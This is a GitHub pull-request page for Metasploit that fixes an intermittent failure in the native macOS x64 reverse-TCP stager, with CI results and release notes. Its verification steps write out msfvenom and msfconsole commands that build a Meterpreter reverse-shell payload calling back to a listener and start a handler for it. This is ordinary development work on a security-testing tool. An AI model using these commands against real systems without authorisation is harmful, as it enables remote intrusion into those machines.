New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix intermittent problem with native osx stager #11165

Merged
merged 4 commits into from Feb 7, 2019

Conversation

Projects
None yet
3 participants
@timwr
Copy link
Contributor

timwr commented Dec 23, 2018

This fixes #11133

Sometimes part of the second stage is read by the first recv syscall:
https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/osx/x64/reverse_tcp.rb#L93
This means there is not enough data to complete the recv syscall in the second stage.

The simplest fix is to just sleep between the two stages.

Verification

The bug is intermittent, but if you run the osx stager about 10 times you should see it (let me know if you don't).

./msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 lport=4444 -f macho -o met
./msfconsole -qx "use exploit/multi/handler; set payload osx/x64/meterpreter/reverse_tcp; set lhost 192.168.0.1; set lport 4444; set ExitOnSession false; run -j"
chmod +x met
./met (repeat 10 times)

This fix also includes a change to the osx stager that allows it run successfully when a debugger is attached (e.g lldb met).

@timwr timwr force-pushed the timwr:fix_11133 branch from b988a34 to 940f255 Dec 24, 2018

@busterb busterb self-assigned this Feb 7, 2019

@busterb busterb merged commit 940f255 into rapid7:master Feb 7, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Feb 7, 2019

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Feb 7, 2019

Release Notes

This works around a reliability problem with the native MacOS stager loading the second stage and the final payload.

jmartin-r7 added a commit that referenced this pull request Feb 7, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment